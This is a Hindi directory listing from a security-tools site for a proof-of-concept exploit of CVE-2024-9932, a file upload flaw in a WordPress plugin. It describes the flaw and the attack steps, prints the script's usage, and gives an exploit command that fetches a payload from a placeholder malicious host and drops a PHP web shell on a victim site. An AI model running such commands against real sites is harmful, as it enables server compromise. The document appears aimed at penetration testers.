Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9932-POC — सबूत-अवधारणा शोषण CVE-2024-9932 के लिए, Wux Blog Editor वर्डप्रेस प्लगइन में एक अप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता, जो दुर्भावनापूर्ण फ़ाइल अपलोड के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-9932-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-9932-poc

CVE-2024-9932-POC

सबूत-अवधारणा शोषण CVE-2024-9932 के लिए, Wux Blog Editor वर्डप्रेस प्लगइन में एक अप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता, जो दुर्भावनापूर्ण फ़ाइल अपलोड के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
101 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9932-POC

विवरण:

Wux Blog Editor WordPress प्लगइन में wuxbt_insertImageNew फ़ंक्शन में अपर्याप्त फ़ाइल प्रकार सत्यापन के कारण मनमानी फ़ाइल अपलोड की भेद्यता है। संस्करण 3.0.0 तक और इसमें शामिल संस्करण प्रभावित हैं। यह भेद्यता अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड एक्सेक्यूशन (RCE) हो सकता है।

भेद्यता विवरण

यह भेद्यता wuxbt_insertImageNew फ़ंक्शन में अनुचित फ़ाइल प्रकार सत्यापन से उत्पन्न होती है। यह हमलावरों को बिना प्रमाणीकरण के सर्वर पर दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है।

हमले का परिदृश्य:

root@kitploit:~
हमलावर कमजोर प्लगइन का उपयोग करने वाली वेबसाइट की पहचान करता है।
दुर्भावनापूर्ण PHP शेल अपलोड करने के लिए फ़ाइल अपलोड कार्यक्षमता का शोषण करता है।
समझौता किए गए सर्वर पर कमांड निष्पादित करता है।

उपयोग

root@kitploit:~
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

Exploit कमांड

root@kitploit:~
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php

परिणाम

सफल अपलोड का उदाहरण

1- फ़ाइल मिली:

2- निष्पादन परिणाम: पेलोड को निष्पादित करने के लिए फ़ाइल के URL पर जाएँ।

root@kitploit:~
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। अनुमति के बिना सिस्टम पर इस स्क्रिप्ट का अनधिकृत उपयोग अवैध है।

टूल डाउनलोड करें